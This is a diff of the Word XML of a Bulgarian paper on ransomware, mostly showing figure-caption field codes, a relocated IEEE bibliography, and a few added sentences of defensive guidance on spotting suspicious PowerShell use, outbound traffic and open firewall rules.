+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> команди, използването на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>RMM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> софтуер, неочаквани комуникации по мрежата и извличане на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>идентификационни данни</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11443,6 +11540,19 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
+        <w:t>Ако има неочаквано голям изходящ трафик, най-вероятно се извличат незаконно данни.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">За облачна инфраструктура да се провери дали на </w:t>
       </w:r>
       <w:r>
@@ -11452,7 +11562,13 @@
         <w:t>firewall</w:t>
       </w:r>
       <w:r>
-        <w:t>-а не е зададено правило 0.0.0.0/0, което дава достъп на всеки от интернет да влезне.</w:t>
+        <w:t xml:space="preserve">-а не е зададено правило 0.0.0.0/0, което дава достъп на всеки от интернет да </w:t>
+      </w:r>
+      <w:r>
+        <w:t>влезе</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -11490,7 +11606,7 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="35" w:name="_Toc223896500" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="35" w:name="_Toc224154949" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -14121,6 +14237,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -14964,12 +15081,184 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
+  <b:Source>
+    <b:Tag>Sto</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
+    <b:Title>#StopRansomware Guide</b:Title>
+    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
+    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
+    <b:RefOrder>1</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Ran</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
+    <b:Title>Ransomware </b:Title>
+    <b:ProductionCompany>FBI</b:ProductionCompany>
+    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
+    <b:RefOrder>2</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Kur22</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Baker</b:Last>
+            <b:First>Kurt</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>History of Ransomware</b:Title>
+    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
+    <b:Year>2022</b:Year>
+    <b:Month>10</b:Month>
+    <b:Day>09</b:Day>
+    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
+    <b:RefOrder>3</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Фил20</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Петров</b:Last>
+            <b:First>Филип</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>RSA</b:Title>
+    <b:Year>2020</b:Year>
+    <b:Month>02</b:Month>
+    <b:Day>16</b:Day>
+    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
+    <b:RefOrder>5</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Wha25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
+    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
+    <b:ProductionCompany>Secure W2</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>09</b:Month>
+    <b:Day>15</b:Day>
+    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
+    <b:RefOrder>6</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>arc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
+    <b:Title>archiveus-trojan</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
+    <b:RefOrder>4</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spe</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
+    <b:Title>Spear phishing</b:Title>
+    <b:ProductionCompany>Ibm</b:ProductionCompany>
+    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Matthew Kosinski</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:RefOrder>7</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Gpc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
+    <b:Title>Gpcode</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
+    <b:RefOrder>8</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Car</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B33FE28A-06AA-43AA-8331-B4CEAD781862}</b:Guid>
+    <b:Title>Social Engineering</b:Title>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>University</b:Last>
+            <b:First>Carnegie</b:First>
+            <b:Middle>Mellon</b:Middle>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
+    <b:RefOrder>13</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Bre25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{3DCF498A-E77B-4961-A5CD-77D2C318EE76}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Robb</b:Last>
+            <b:First>Brenda</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals</b:Title>
+    <b:ProductionCompany>BlackFog</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>06</b:Month>
+    <b:Day>24</b:Day>
+    <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
+    <b:RefOrder>11</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spr</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{4BD5D5E2-11B2-43B8-8295-F956C5FB1705}</b:Guid>
+    <b:Title>Spring Security Crypto Module</b:Title>
+    <b:ProductionCompany>Spring</b:ProductionCompany>
+    <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
+    <b:RefOrder>12</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Бял</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{86C8A9EE-D72B-49F2-8AA7-3534AB86AA70}</b:Guid>
+    <b:Title>Бял заек Ransomware</b:Title>
+    <b:ProductionCompany>EnigmaSoft</b:ProductionCompany>
+    <b:URL>https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/</b:URL>
+    <b:RefOrder>10</b:RefOrder>
+  </b:Source>
+  <b:Source xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography">
+    <b:Tag>Чов25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{88E52C84-D818-4670-B18A-420A29F4B14B}</b:Guid>
+    <b:Title>Човешка грешка пуснала "Белия заек" да хакне системата на ВАС</b:Title>
+    <b:ProductionCompany>СЕГА</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>01</b:Month>
+    <b:Day>30</b:Day>
+    <b:URL>https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas</b:URL>
+    <b:RefOrder>9</b:RefOrder>
+  </b:Source>
+</b:Sources>
 </file>
 
 <file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
@@ -15168,184 +15457,12 @@
 </file>
 
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
-  <b:Source>
-    <b:Tag>Sto</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
-    <b:Title>#StopRansomware Guide</b:Title>
-    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
-    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
-    <b:RefOrder>1</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Ran</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
-    <b:Title>Ransomware </b:Title>
-    <b:ProductionCompany>FBI</b:ProductionCompany>
-    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
-    <b:RefOrder>2</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Kur22</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Baker</b:Last>
-            <b:First>Kurt</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>History of Ransomware</b:Title>
-    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
-    <b:Year>2022</b:Year>
-    <b:Month>10</b:Month>
-    <b:Day>09</b:Day>
-    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
-    <b:RefOrder>3</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Фил20</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Петров</b:Last>
-            <b:First>Филип</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>RSA</b:Title>
-    <b:Year>2020</b:Year>
-    <b:Month>02</b:Month>
-    <b:Day>16</b:Day>
-    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
-    <b:RefOrder>5</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Wha25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
-    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
-    <b:ProductionCompany>Secure W2</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>09</b:Month>
-    <b:Day>15</b:Day>
-    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
-    <b:RefOrder>6</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>arc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
-    <b:Title>archiveus-trojan</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
-    <b:RefOrder>4</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Spe</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
-    <b:Title>Spear phishing</b:Title>
-    <b:ProductionCompany>Ibm</b:ProductionCompany>
-    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Matthew Kosinski</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:RefOrder>7</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Gpc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
-    <b:Title>Gpcode</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
-    <b:RefOrder>8</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Car</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{B33FE28A-06AA-43AA-8331-B4CEAD781862}</b:Guid>
-    <b:Title>Social Engineering</b:Title>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>University</b:Last>
-            <b:First>Carnegie</b:First>
-            <b:Middle>Mellon</b:Middle>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:URL>https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</b:URL>
-    <b:RefOrder>13</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Bre25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{3DCF498A-E77B-4961-A5CD-77D2C318EE76}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Robb</b:Last>
-            <b:First>Brenda</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>AI and Ransomware Prevention: How Smart Tech can Outsmart Cybercriminals</b:Title>
-    <b:ProductionCompany>BlackFog</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>06</b:Month>
-    <b:Day>24</b:Day>
-    <b:URL>https://www.blackfog.com/ai-and-ransomware-prevention-how-smart-tech-can-outsmart-cybercriminals</b:URL>
-    <b:RefOrder>11</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Spr</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{4BD5D5E2-11B2-43B8-8295-F956C5FB1705}</b:Guid>
-    <b:Title>Spring Security Crypto Module</b:Title>
-    <b:ProductionCompany>Spring</b:ProductionCompany>
-    <b:URL>https://docs.spring.io/spring-security/reference/features/integrations/cryptography.html</b:URL>
-    <b:RefOrder>12</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Бял</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{86C8A9EE-D72B-49F2-8AA7-3534AB86AA70}</b:Guid>
-    <b:Title>Бял заек Ransomware</b:Title>
-    <b:ProductionCompany>EnigmaSoft</b:ProductionCompany>
-    <b:URL>https://www.enigmasoftware.com/bg/byalzaekransomware-otstranqvane/</b:URL>
-    <b:RefOrder>10</b:RefOrder>
-  </b:Source>
-  <b:Source xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography">
-    <b:Tag>Чов25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{88E52C84-D818-4670-B18A-420A29F4B14B}</b:Guid>
-    <b:Title>Човешка грешка пуснала "Белия заек" да хакне системата на ВАС</b:Title>
-    <b:ProductionCompany>СЕГА</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>01</b:Month>
-    <b:Day>30</b:Day>
-    <b:URL>https://www.segabg.com/category-bulgaria/choveshka-greshka-pusnala-beliya-zaek-da-hakne-sistemata-na-vas</b:URL>
-    <b:RefOrder>9</b:RefOrder>
-  </b:Source>
-</b:Sources>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
@@ -15357,9 +15474,9 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
@@ -15384,9 +15501,9 @@
 </file>
 
 <file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{451CF4A7-B298-49AF-BD69-AB8853A0DC1A}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>

--- a/Ransomware.docx
+++ b/Ransomware.docx
@@ -3743,14 +3743,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3990,14 +4003,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>2</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4419,14 +4445,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>3</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -4903,14 +4942,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>4</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5012,14 +5064,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>5</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5302,14 +5367,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>6</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -5435,14 +5513,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>7</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6089,13 +6180,8 @@
         </w:rPr>
         <w:t>R</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ansomware</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Както </w:t>
+      <w:r>
+        <w:t xml:space="preserve">ansomware. Както </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6518,14 +6604,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>8</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -6913,14 +7012,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>9</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:t>9</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -7108,14 +7220,27 @@
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
-      <w:fldSimple w:instr=" SEQ Фигура \* ARABIC ">
-        <w:r>
-          <w:rPr>
-            <w:noProof/>
-          </w:rPr>
-          <w:t>10</w:t>
-        </w:r>
-      </w:fldSimple>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
